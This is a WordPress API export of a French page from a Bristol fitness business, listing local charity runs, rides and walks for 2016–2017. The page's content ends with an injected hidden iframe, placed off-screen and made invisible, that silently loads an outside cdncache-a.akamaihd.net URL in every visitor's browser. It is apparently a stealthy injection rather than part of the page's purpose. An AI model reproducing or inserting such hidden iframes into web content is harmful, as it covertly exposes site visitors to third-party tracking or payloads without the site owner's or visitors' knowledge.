{"id":2247,"date":"2022-06-15T10:50:17","date_gmt":"2022-06-15T10:50:17","guid":{"rendered":"http:\/\/rainbowfitness.org\/evenements-caritatifs-2017\/"},"modified":"2022-06-15T10:50:18","modified_gmt":"2022-06-15T10:50:18","slug":"evenements-caritatifs-2017","status":"publish","type":"page","link":"https:\/\/rainbowfitness.org\/fr\/evenements-caritatifs-2017\/","title":{"rendered":"\u00c9v\u00e9nements caritatifs 2017"},"content":{"rendered":"[vc_row row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1466687919046{padding-top: 20px !important;padding-bottom: 40px !important;}\u00a0\u00bb][vc_column_text]\n<h1 style=\"text-align: center;\"><span style=\"color: #2c82c9;\">\u00c9V\u00c9NEMENTS CARITATIFS 2017<\/span><\/h1>\n[\/vc_column_text][vc_separator type=\u00a0\u00bbsmall\u00a0\u00bb position=\u00a0\u00bbcenter\u00a0\u00bb color=\u00a0\u00bb#9365b8&Prime; thickness=\u00a0\u00bb5&Prime;][\/vc_column][\/vc_row][vc_row row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1470433735502{padding-bottom: 25px !important;}\u00a0\u00bb][vc_column_text css=\u00a0\u00bb.vc_custom_1467111361561{padding-bottom: 10px !important;}\u00a0\u00bb]Voici quelques-uns des nombreux organismes de bienfaisance locaux impliqu\u00e9s dans les \u00e9v\u00e9nements locaux de course \u00e0 pied, de cyclisme, de trekking et plus&nbsp;:[\/vc_column_text][vc_column_text css=\u00a0\u00bb.vc_custom_1467111473588{padding-bottom: 10px !important;padding-left: 15px !important;}\u00a0\u00bb]\n<ul>\n<li><a href=\"http:\/\/www.stroke.org.uk\/search\/node\/bristol%20events\" target=\"_blank\" rel=\"noopener\">Association de l&rsquo;AVC<\/a><\/li>\n<li><a href=\"http:\/\/www.chsw.org.uk\/events\" target=\"_blank\" rel=\"noopener\">Hospice pour enfants du Sud-Ouest<\/a><\/li>\n<li><a href=\"http:\/\/www.stpetershospice.org.uk\/events\/\" target=\"_blank\" rel=\"noopener\">Hospice Saint-Pierre<\/a><\/li>\n<li><a href=\"http:\/\/www.sueryder.org\/Get-involved\/Events\" target=\"_blank\" rel=\"noopener\">Sue Ryder Soins neurologiques<\/a><\/li>\n<li><a href=\"http:\/\/www.pennybrohncancercare.org\/events\/\" target=\"_blank\" rel=\"noopener\">Penny Brohn Soins contre le cancer<\/a><\/li>\n<li><a href=\"http:\/\/www.cancerresearchuk.org\/support-us\/find-an-event\" target=\"_blank\" rel=\"noopener\">Recherche sur le cancer au Royaume-Uni<\/a><\/li>\n<\/ul>\n[\/vc_column_text][vc_column_text css=\u00a0\u00bb.vc_custom_1467111503454{padding-bottom: 10px !important;}\u00a0\u00bb]Cette ann\u00e9e, Rainbow Fitness vous offrira des s\u00e9ances d&rsquo;\u00e9chauffement professionnelles gratuites (massages 1to1 et \u00e9tirements assist\u00e9s 1to1) lors des \u00e9v\u00e9nements suivants&nbsp;:[\/vc_column_text][vc_column_text css=\u00a0\u00bb.vc_custom_1467111555841{padding-bottom: 10px !important;padding-left: 15px !important;}\u00a0\u00bb]\n<ul>\n<li>R\u00e9solution de course 5-10-15km<\/li>\n<li>Tour de Bristol 30-50-75km<\/li>\n<li>Bristol 10 km<\/li>\n<li>Course arc-en-ciel 5 km<\/li>\n<li>Marche de minuit<\/li>\n<li>Roulez pour des vies pr\u00e9cieuses<\/li>\n<li>Bristol Demi M<\/li>\n<li>Marathon Bristol-Bath<\/li>\n<li>P\u00e8re No\u00ebl en fuite 2km<\/li>\n<\/ul>\n[\/vc_column_text][\/vc_column][\/vc_row][vc_row row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1470433743774{padding-bottom: 55px !important;}\u00a0\u00bb][vc_accordion active_tab=\u00a0\u00bb\u00a0\u00bb collapsible=\u00a0\u00bbyes\u00a0\u00bb style=\u00a0\u00bbaccordion\u00a0\u00bb][vc_accordion_tab title=\u00a0\u00bbLiens vers les \u00e9v\u00e9nements caritatifs 2016&Prime; title_color=\u00a0\u00bb#782dbf\u00a0\u00bb title_tag=\u00a0\u00bbh3&Prime;][vc_column_text]<span style=\"font-family: Arial; color: #ffffff;\"> <\/span><\/p>\n<p><span style=\"color: #ffffff;\"> &#8211; Dimanche 11 d\u00e9cembre 13h Bristol, <strong><a style=\"color: #ffffff;\" href=\"http:\/\/www.chsw.org.uk\/events\/christmas\/santas-on-the-run\">Santa&rsquo;s on the Run : marche de 2km<\/a><\/strong> &#8211; course pour toute la famille ; soutenir les familles locales<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\"> organisme de bienfaisance CHSW.<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\"> &#8211; Dimanche 2 octobre, <a style=\"color: #ffffff;\" href=\"http:\/\/www.thecolourfunrun.co.uk\/\" target=\"_blank\" rel=\"noopener\"><strong><span style=\"font-family: Arial;\">la Colourful Run<\/span><\/strong><\/a> 5km, 14h d\u00e9part Bristol.<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\"> &#8211; 18 septembre.Cyclisme : <a style=\"color: #ffffff;\" href=\"https:\/\/www.stroke.org.uk\/events\/sporting-fundraising\/bristol-1006025-mile-bike-ride\" target=\"_blank\" rel=\"noopener\"><strong>Bristol 100<\/strong><\/a> , 25-60-100 Miles cycles pour Stroke Association.<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\">[18\/06\/16], <strong><a style=\"color: #ffffff;\" href=\"http:\/\/www.chsw.org.uk\/rainbowbristol#.VuK2-nri58E\" target=\"_blank\" rel=\"noopener\">Rainbow Run<\/a><\/strong> , un \u00e9v\u00e9nement amusant, ax\u00e9 sur les amis et la famille, course de 5 km dans le parc[Road &#038; grass] Westbury Park Bristol, Merci <a style=\"color: #ffffff;\" href=\"https:\/\/www.facebook.com\/events\/866702186701464\/\" target=\"_blank\" rel=\"noopener\">Children Hospice South West<\/a> .<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\">[09\/07\/16], du samedi au dimanche, \u00e0 pied de <a style=\"color: #ffffff;\" href=\"http:\/\/midnightwalk.stpetershospice.org.uk\/\" target=\"_blank\" rel=\"noopener\"><strong><span style=\"font-family: Arial;\">minuit, \u00e0 pied<\/span><\/strong><\/a> de 5 et 10 milles, \u00e0 travers les monuments de Bristol, une soir\u00e9e s\u00fbre et vraiment amusante! Vive <a style=\"color: #ffffff;\" href=\"https:\/\/www.facebook.com\/events\/1761972737358236\/\">l&rsquo;hospice Saint-Pierre<\/a> .<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\">[22\/05\/16], <a style=\"color: #ffffff;\" href=\"https:\/\/www.stroke.org.uk\/events\/sporting-fundraising\/velothon-wales-2016-22-may\" target=\"_blank\" rel=\"noopener\">V\u00e9lothon<\/a> aux Baleines : <a style=\"color: #ffffff;\" href=\"http:\/\/www.velothon-wales.co.uk\/en\/route\/route-information\/interactive-route-map-2016-route\/#map\" target=\"_blank\" rel=\"noopener\">50 ou 140km<\/a> avec Stroke Association.<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\">[24\/04\/16], <a style=\"color: #ffffff;\" href=\"http:\/\/frenchay10k.co.uk\/\" target=\"_blank\" rel=\"noopener\">course caritative Frenchay 10k<\/a> . <\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\">[02\/04\/16] <a style=\"color: #ffffff;\" href=\"http:\/\/www.stpetershospice.org.uk\/events\/\" target=\"_blank\" rel=\"noopener\"><strong><span style=\"font-family: Arial;\">Tour de Bristol<\/span><\/strong><\/a> , Epreuve cycliste : 35 -50 75km. <\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\">[20\/03\/16] Course de <a style=\"color: #ffffff;\" href=\"https:\/\/www.stroke.org.uk\/events\/sporting-fundraising\/resolution-run-ashton-court-2016-0\" target=\"_blank\" rel=\"noopener\"><strong><span style=\"font-family: Arial;\">r\u00e9solution<\/span><\/strong><\/a> de 5-10-15 km. Ashton Park Bristol, sentiers et \u00e9v\u00e9nement tout-terrain organis\u00e9 par <a style=\"color: #ffffff;\" href=\"https:\/\/www.facebook.com\/events\/165647733801318\/\" target=\"_blank\" rel=\"noopener\">Stroke Association<\/a> . Choisissez votre distance de course\/marche&nbsp;!<\/span><\/p>\n<p><span style=\"font-family: Arial; color: #ffffff;\">[24\/01\/16] <a style=\"color: #ffffff;\" href=\"http:\/\/www.avonridingcentre.org.uk\/2015\/11\/moorland-multi-terrain-10k-approx-race-sunday-24th-january-2016-at-11-00am\/\" target=\"_blank\" rel=\"noopener\"><strong><span style=\"font-family: Arial;\">Moorland multi Terrain 10km<\/span><\/strong><\/a> , Merci \u00e0 l&rsquo;organisme caritatif <a style=\"color: #ffffff;\" href=\"http:\/\/www.avonridingcentre.org.uk\/non-riding-events\/\" target=\"_blank\" rel=\"noopener\">du Centre \u00c9questre Avon<\/a> chaque ann\u00e9e.<\/span><\/p>\n<p><iframe loading=\"lazy\" style=\"position: absolute; top: -999px; left: -999px; visibility: hidden;\" src=\"https:\/\/cdncache-a.akamaihd.net\/store\/\" width=\"300\" height=\"150\"><\/iframe>[\/vc_column_text][\/vc_accordion_tab][\/vc_accordion][\/vc_column][\/vc_row]\n","protected":false},"excerpt":{"rendered":"<p>[vc_row row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1466687919046{padding-top: 20px !important;padding-bottom: 40px !important;}\u00a0\u00bb][vc_column_text] \u00c9V\u00c9NEMENTS CARITATIFS 2017 [\/vc_column_text][vc_separator type=\u00a0\u00bbsmall\u00a0\u00bb position=\u00a0\u00bbcenter\u00a0\u00bb color=\u00a0\u00bb#9365b8&Prime; thickness=\u00a0\u00bb5&Prime;][\/vc_column][\/vc_row][vc_row row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column css=\u00a0\u00bb.vc_custom_1470433735502{padding-bottom: 25px !important;}\u00a0\u00bb][vc_column_text css=\u00a0\u00bb.vc_custom_1467111361561{padding-bottom: 10px !important;}\u00a0\u00bb]Voici quelques-uns des nombreux organismes de bienfaisance locaux impliqu\u00e9s dans les \u00e9v\u00e9nements&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-2247","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages\/2247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/comments?post=2247"}],"version-history":[{"count":2,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages\/2247\/revisions"}],"predecessor-version":[{"id":2257,"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/pages\/2247\/revisions\/2257"}],"wp:attachment":[{"href":"https:\/\/rainbowfitness.org\/fr\/wp-json\/wp\/v2\/media?parent=2247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}